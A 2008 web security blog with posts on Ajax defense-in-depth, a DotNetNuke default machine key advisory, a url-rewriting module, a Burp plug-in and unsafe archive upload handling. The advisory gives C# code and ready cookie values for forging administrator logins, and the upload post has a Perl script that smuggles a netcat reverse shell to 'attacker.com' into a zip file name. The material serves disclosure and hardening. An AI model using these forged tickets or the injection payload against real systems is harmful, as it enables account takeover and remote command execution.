Search
RSS Feed
Twitter
Thursday
Apr242008

Web 2.0 and "Defense in Depth"

I was recently asked by a client for some technical countermeasures to consider as they prepare to build an Ajax enabled web application (aside from the more fundamental countermeasures like rigid output encoding and request tokenization to defend against XSS and XSRF respectively). What follows are a few suggestions I provided for implementing "defense in depth" within their Ajax enabled (Web 2.0) application.

  • Specify the Appropriate Content-Type Response Header

By default, most HTTP responses generated by a web component include a "Content-Type" header value of "text/html" or "text/plain". These responses are treated by a web browser as HTML and get loaded in the browser DOM.

When rendering responses for Ajax requests, non-HTML content (like XML or JSON) is typically returned, so it is important to specify the correct "Content-Type" HTTP response header. For example, XML messages returned by Ajax calls should have a "Content-Type: text/xml" header. These responses will not be loaded into the browser DOM (based on their content-type), which can potentially thwart XSS attacks in the absence of other controls like proper output encoding.

  • Require POST Method for Ajax Calls Returning User Data

Any data rendered by an Ajax GET request is potentially susceptible to JavaScript Hijacking if there are no controls specifically designed to thwart the attack (such as an XSRF token).

JavaScript Hijacking attacks rely on use of the <SCRIPT> tag "SRC" attribute, which is unable to make POST requests. As such, accepting only POST requests for Ajax calls that return user (or otherwise sensitive) data is generally a good idea.

  • Check Content-Type on POST Requests

The browser "same origin" security policy is a key mechanism used to thwart malicious use of the XMLHttpRequest (XHR) object at the browser level. Standard HTML forms are not restricted by the same origin policy, so verifying that Ajax requests are made using the XHR object and not an HTML form can potentially buy some added safety.

Consider the following HTML form, which can be used to forge a JSON post (a similar technique can be used to forge XML requests):

<FORM TARGET="/ajax/dispatcher" METHOD="POST">
<INPUT TYPE="hidden" NAME='{"action": "sendEmail", "recipient": "[email protected]", "messageText": "Hi George! ' VALUE=')"}'>
</FORM>

The results of the above form POST are shown below. As you can see, to the server the request will look like a valid JSON request (which is typically assumed to have been made using the XHR).

{"action": "sendEmail", "recipient": "[email protected]", "messageText": "Hi George! =)"}

By default, POST requests made using the XHR browser object will have a Content-Type header of "application/xml". A standard HTML form submission will typically have a Content-Type header of "application/x-www-form-urlencoded" or "multipart/form-data", so checking this value (server-side) can be one way to help ensure the request was not issued via a rogue 3rd party HTML form.

  • Host 3rd Party Content in a Separate IFrame

When serving up 3rd party content, the developer should anticipate the possibility of embedded malicious script code.

Consider a typical RSS feed. The importance of HTML encoding RSS data elements when being rendered in the page is generally well understood; however certain elements (such as the <link> element) can pose additional challenges.

Normally the <link> RSS element is rendered within the "href" attribute value of an HTML "A" tag. Depending on how the data is encoded, XSS is often still possible since an exploit string such as "javascript:alert('XSS')" will be unaffected by most native HTML encoding mechanism (like the built-in Server.HtmlEncode method in ASP.NET).

In addition to stringent encoding techniques, a good secondary defense-in-depth policy to prevent these attacks is to render all 3rd party content (i.e RSS, JavaScript widgets, etc) in a separate IFrame. Serving un-trusted content within a separate IFrame will not prevent a malicious script from executing, but it will prevent the malicious script from accessing application data via the DOM since the IFrame will have its own DOM context.

This is by no means intended to be a complete list of defensive Web 2.0 suggestions, so feel free to comment with additional thoughts.

Friday
Mar212008

DotNetNuke Default Machine Key Advisory

This morning we released an advisory to bugtraq regarding an exposure in DotNetNuke that can be used to trivially forge authentication tokens and impersonate arbitrary users (including the built in admin account). The vendor was notified back on March 3, 2008 and has now corrected the issue with the release of DotNetNuke version 4.8.2, so we have made the advisory public. This issue affects DotNetNuke versions 4.8.1 and below. Additional information can be found in the official DotNetNuke Security Bulletin.

Overview

DotNetNuke (DNN) is an open-source Web Application Framework used to create and deploy websites. The default web.config files distributed with DNN include an embedded Machine Key value (both ValidationKey and DecryptionKey). Under certain circumstances these values may not be updated during the installation/upgrade process, resulting in the ability for an attacker to forge arbitrary ASP.NET forms authentication tickets that can then be used to circumvent all security within a DNN installation. This issue was confirmed to affect the production instance of DNN used on the DNN Homepage (www.dotnetnuke.com).

Technical Details

The default web.config files distributed with DotNetNuke (DNN) include the following embedded ValidationKey and DecryptionKey values:

<machineKey
validationKey="F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902"
decryptionKey="F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902F8D923AC"
decryption="3DES"
validation="SHA1"/>

Normally, these values are overwritten by the web-based installation wizard during the initial website setup process. Specifically, the Config.UpdateMachineKey() routine is called during the initial installation process. Under certain scenarios where the web server user account does not have access to update the web.config file during installation, the default value will fail to be updated resulting in a DNN installation that uses these values for authentication token encryption and validation. It is unclear how widespread this issue could potentially be, however it was confirmed that the production instance of DNN used on the DNN Homepage (www.dotnetnuke.com) was affected by this issue.

Proof-of-Concept Exploit

This vulnerability is trivially exploited against any DNN installation using the default ValidationKey and DecryptionKey values. In order to exploit this issue, two forged cookies (named ".DOTNETNUKE" and "portalroles") must be generated. The ".DOTNETNUKE" cookie is used by the ASP.NET Forms Authentication Provider to identify the authenticated user, while the "portalroles" cookie is used by DNN to store role memberships for the current authenticated user.

The following c# code excerpt, when run from an ASP.NET web form configured to use the default ValidationKey and DecryptionKey values, can be used to generate the two required FormsAuthenticationTicket values required to exploit this issue:

// Step 1: Generate the two FormsAuthenticationTickets

FormsAuthenticationTicket ticket1 = new FormsAuthenticationTicket("admin", true, 10000);
FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, "admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered Users;Subscribers;Administrators");

// Step 2: Encrypt the FormsAuthenticationTickets

string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);

The two cookie strings produced by the above code, as shown in the request below, can be used to obtain administrator level access to DNN installations affected by this issue.

NOTE: The exact cookie values shown below can be used for testing & exploits.

GET /default.aspx HTTP/1.1
Host: www.dotnetnuke.com
Cookie: portalroles=CB14B7E2553D9F6259ECF746F2D77FD15B05C5A10D98225339D6E282EFEFB3DA

90D0747CEE5FAF2E7605B598311BA3349D25C108FBCEC7A0141BE6CDA83F2896342FBA33FFD8
CB18D9A8896F30182B9EEB47786AB9574F6F3EBD9ECF56C389B401BCF744224A869F4C23D5E4
280ACC8E16A2113C0770317F3A741630C77BB073871BE3E1E8A6F67AC5F0AC0582925D690B1D
777C0302E18E;.DOTNETNUKE=6BBF011195DE71050782BD8E4A9B906F770FEDF87AE1FC32D31
B27A14E2307BF986E438E06F4B28DD30706CB516290D5CE1513DD677E64A098F912E2F63E3BE
3DDE63809B616F614

Recommendation

DotNetNuke v4.8.2 has been released by DotNetNuke Corporation, which specifically addresses this issue. Additionally, check your web.config file to ensure that the validationkey value is not set to "F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902".

Wednesday
Feb272008

Bi-Directional HTTP Transformation

The ability to transform and inspect HTTP data as it flows in and out of a web application has many practical uses (both inside and outside of security). On IIS, this capability was historically restricted to ISAPI filters. Http Modules written in ASP.NET have always allowed processing of requests and responses to and from an ASP.NET application, but with the advent of IIS7 and the integrated ASP.NET pipeline, Http Modules written in ASP.NET now have access to virtually all stages of request processing (including those not handled by ASP.NET).

Transformer.NET is an Http Module designed for on-the-fly inbound and outbound url rewriting. Apache's mod_rewrite, used to manipulate inbound request urls, is arguably one of the most popular Apache modules around. While there have been several ports of mod_rewrite to IIS (with implementations ranging from Http Modules to ISAPIs), they all share one shortcoming in common with their Apache predecessor: They only rewrite requests and not urls within outbound responses (such as links that are generated within an HTML page).

This has long been a pet peeve of mine. If you want to use mod_rewrite, you typically need to update the underlying website source code so that the hyperlinks within the application point to the "rewritten" urls. This can be a major effort and inconvenience if the site is already written, and even worse, it may not be possible for 3rd party or COTS web applications.

The initial beta release of Transformer.NET differs from previous rewrite modules because it supports bi-directional (inbound and outbound) url rewriting. Bi-directional rewriting eliminates the need to modify the underlying website code, which is great for legacy or third party web sites and applications. In addition to the ability to parse response content (such as HTML), Transformer.NET also includes the following two key internal mechanisms:

 

Normalization Engine

Normalizing all urls into their absolute representation quickly became essential for two reasons. First, the module needs to be able to apply configured rules to a given url in any form. So a rule for "/foo/bar.htm" might need to be applied to "bar.htm", "../bar.htm", or any other number of relative url variants depending on the path of the rendering page. Second, if "/foo/bar.htm" is rewritten to "/fake/bar.htm", then suddenly all of the relative links on the page (images, css, etc) will be broken. Replacing a relative link on a rewritten page with its absolute counterpart is essential.

Internal Url Cache

Like anything in the software world, performance is important. Inspecting and transforming very large responses when lots of rules have been defined can be a real performance killer. To help minimize performance impact, Transformer.NET maintains an internal cache of all rewrites that are performed. This eliminates un-needed processing the next time the url is rendered on a page. The net result is that as more requests are parsed by the module, performance impact continually decreases. To avoid stale cache entries, the cache gets cleared any time a change is made to a rewrite rule.

The bi-directional rewriting capability of Transformer.NET was really an initial "proof-of-concept" for us to start building bi-directional HTTP inspection and transformation solutions to solve some very interesting web application security problems.

Unlike Apache's mod_rewrite, Transformer.NET does not implement conditional rewrites (ala mod_rewrite's RewriteCond) so it is not intended to be a total port. The current beta version can be downloaded from our tools page. Transformer works on IIS6 (limited to ASP.NET applications) and with any site running on IIS7. A detailed user guide is included with the download.

Tuesday
Feb192008

A "Deflate" Burp Plug-In

I wrote a plug-in for Burp Proxy that decompresses HTTP response content in the ZLIB (RFC1950) and DEFLATE (RFC1951) compression data formats. This arose out of an immediate need on a recent web application security assessment.

Inspecting the HTTP traffic between client and server of the application under review, it appeared that most of the response bodies were compressed and unfortunately not being decoded by Burp (despite the "unpack gzip" option being enabled). The client, a Java applet, relied on response data for a lot of interesting functionality (including access control) and having the ability to easily view and manipulate the contents in plaintext before being received by the applet was clearly beneficial (let's ignore the obvious client-side security issue here ' this is a topic for another discussion).

As I mentioned earlier, it appeared the response content was compressed; however the expected Content-Encoding HTTP response header was not present. Inspection of the de-compiled Java applet code confirmed that compression was being performed with the java.util.zip.Deflater and java.util.zip.Inflater classes. At present, Burp Proxy does not support the ZLIB and DEFLATE compression formats (only GZIP compression is supported).

Burp is an essential tool in any web app testing toolkit and extending its functionality to inflate "deflate" compressed response content via the handy IBurpExtender interface seemed a worthwhile contribution. I hope others find the plug-in useful as well; at a minimum, it will be useful when the application returns for a round of regression testing.

The Burp plug-in can be downloaded here.

Also included with the download is an example servlet called "DeflateTestServlet" for generating HTTP responses bodies in the RFC1950 and RFC1951 compressed formats for testing the plug-in.

Also, here's a good link that may help clarify your understanding of the compression formats used with HTTP.

Monday
Jan212008

Handling Uploaded Archives Securely

Insecure handling of file uploads is one of my favorite issues to test for during web application security assessments. They often provide exploitable attack vectors for compromising the server, application and/or end-user. In this post, I focus on insecure handling of uploaded archive files ' something I've seen repeatedly. From my experience, most of the applications vulnerable to this flaw do a fairly good job vetting the uploaded file itself, but fail to apply the same scrutiny to the packaged files. Consider the following PHP code snippet:

Example 1:

<?
if (isFileValidArchive())
{
$files = getSortedListOfFilesFromValidatedArchive();

foreach ($files as $filename)
{
$ext = substr($filename, strrpos($filename, '.') + 1);
//only handle .doc files
if ($ext == "doc")
{
$cmd = "/usr/bin/unzip -j -o " .
$_FILES['userfile']['tmp_name']
. "\"" . $filename . "\" -d /tmp/uploads";
exec($cmd,$results,$status);
// process results
}
}
}
?>

The $filename variable holds the name of a packaged file (such as "somefile.doc") retrieved from an uploaded archive. As usual, blind trust of user-supplied input (i.e. the name of a file packaged within a user uploaded .zip file) creates an exploitable attack vector ' in this case, arbitrary command execution. Given the attacker's operating system is likely to prevent certain special characters within a file name, how is this exploitable?

For example, the characters < > : " / \ | ? * are typically forbidden by MS Windows operating systems. These same characters are often useful for manipulating command strings.

To answer the question above, zip compression libraries are a good solution because they provide functionality to create and package archives in memory, which are obviously not bound by OS file system constraints. Allowing special characters in a file name is likely not an oversight as it appears in line with the .ZIP File Format Specification. It's also worth noting that the spec permits the use of alternate character encodings, which could be leveraged by an attacker to bypass potential blacklist filtering mechanisms. The following Perl script uses this zip compression library to exploit the command injection flaw in Example 1.

use chilkat;

# Create a .zip archive in-memory
$zip = new chilkat::CkZip();
$zip->UnlockComponent("anything for 30-day trial");
$zip->NewZip("MaliciousArchive.zip");

# Package a file with a malicious file name
$zip->AppendString("foo\" & nc -c /bin/sh attacker.com 8888 & \"bar.doc","junk");
$zip->WriteZipAndClose();

From a security code review perspective, the use of the PHP exec() function in Example 1 should be an immediate red flag (whether you are a security auditor or a developer). In general, shelling out to perform OS commands is never a good idea, especially if the command potentially contains user input.

A safer alternative when building applications could be native or 3rd party zip compression APIs, such as PHP Zip File Extensions or the Java package java.util.zip. However, even when these are used, developers still find a way to do it insecurely. Consider Example 2 which is a code snippet from a J2EE web application:

Example 2:

ZipFile zipFile = new ZipFile(uploadedZipFile);

try
{
Enumeration<? extends ZipEntry> zipEntries = zipFile.entries();
while (zipEntries.hasMoreElements())
{
ZipEntry zipEntry = zipEntries.nextElement();
File packagedFile = new File("/tmp/uploads", zipEntry.getName());
// Create "packagedFile" on file system and
// Copy contents of "zipEntry" into it
}
}

Again, the attacker controls everything within the zip file. Embedding characters such as ../ into the name of the packaged file, an attacker could traverse out of "/tmp/uploads" and force the application to write the packaged file into any location, such as the web root directory. A simple "cmd.jsp" file would allow the attacker to execute arbitrary commands on the web server.

How can developers harden their applications so they are not vulnerable to similar mistakes? First, ensure the application is secured with appropriate server-side controls when handling file uploads, i.e.

  • maximum file size enforcement
  • file type and format restrictions
  • random filename assignment
  • virus scanning
  • storing the file into a non-web accessible directory
  • etc, etc, etc

If archive files are permitted, ensure the same level of stringent validation is also applied to packaged files and, most importantly, never trust user-supplied data elements (such as file names or other file attributes) when determining where and how a file will be stored on the file system.